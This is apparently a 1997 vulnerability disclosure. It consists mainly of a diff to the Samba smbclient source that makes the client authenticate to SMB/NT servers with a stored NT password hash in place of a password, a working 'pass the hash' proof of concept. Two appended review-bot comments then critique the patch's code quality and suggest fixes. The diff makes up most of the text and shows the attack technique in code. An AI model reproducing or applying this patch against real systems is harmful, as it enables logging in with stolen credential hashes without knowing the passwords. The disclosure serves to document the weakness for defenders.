NT "Pass the Hash" with Modified SMB Client Vulnerability
*** orig_client.c Tue Apr 8 17:27:29 1997 --- client.c Tue Apr 8 20:57:43 1997 *************** *** 3020,3026 **** {-1,NULL} }; - /**************************************************************************** send a login command ****************************************************************************/ --- 3020,3025 ---- *************** *** 3039,3044 **** --- 3038,3061 ---- int numprots; int tries=0; + #ifdef USESMBPASSWDFILE + /*TODO check for valid password and uid = getuid */ + BOOL got_encpass; + struct passwd *pwd; + struct smb_passwd *smb_pass; + unsigned char p21[21]; + + memset(p21, 0, sizeof p21); + pwd = getpwuid(getuid()); + if (pwd && (smb_pass = get_smbpwnam(pwd->pw_name))) + { + strcpy(password, "not empty"); + got_pass = got_encpass = True; + memcpy(p21, smb_pass->smb_passwd, 16); + } + setuid(getuid()); + #endif + if (was_null) { inbuf = (char *)malloc(BUFFER_SIZE + SAFETY_MARGIN); *************** *** 3189,3194 **** --- 3205,3215 ---- if (doencrypt && *pass) { DEBUG(3,("Using encrypted passwords\n")); passlen = 24; + + #ifdef USESMBPASSWDFILE + if (got_encpass) E_P24(p21,cryptkey,pword); + else + #endif SMBencrypt(pass,cryptkey,pword); } #else *************** *** 3252,3257 **** --- 3273,3281 ---- (CVAL(inbuf,smb_rcls) == ERRSRV && SVAL(inbuf,smb_err) == ERRbadpw))) { + #ifdef USESMBPASSWDFILE + got_encpass = + #endif got_pass = False; DEBUG(3,("resending login\n")); goto get_pass; |
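Review bot: `got_encpass` is declared without an initializer in the block added at 3038 and is set only when `get_smbpwnam` returns an entry, yet the hunk at 3205 tests `if (got_encpass)`. When the lookup fails, that test reads an indeterminate value and `E_P24` can run on the all-zero `p21`; declare it as `BOOL got_encpass = False;`. The result of `setuid(getuid())` is also ignored, so a failed privilege drop would leave the rest of the function running with whatever privilege was presumably needed to read the password file; test the return value and abort the login on failure. The enclosing function starts and ends outside the hunk, so its return type is not visible here.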
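Review bot: The `else` added at 3205 ends inside the `#ifdef` and binds to the `SMBencrypt` call on the far side of `#endif`, which is easy to break on a later edit. The last hunk has the same shape, where `got_encpass =` is completed by `got_pass = False;` after `#endif`. Brace the branch as `if (got_encpass) { E_P24(p21,cryptkey,pword); } else` and write `got_encpass = False;` as its own statement. Because this branch derives the 24-byte response directly from the stored 16-byte hash, it also deserves a comment such as `/* stored hash is password-equivalent: protect the smbpasswd file like cleartext passwords */`, and `p21` should be cleared once the response has been computed.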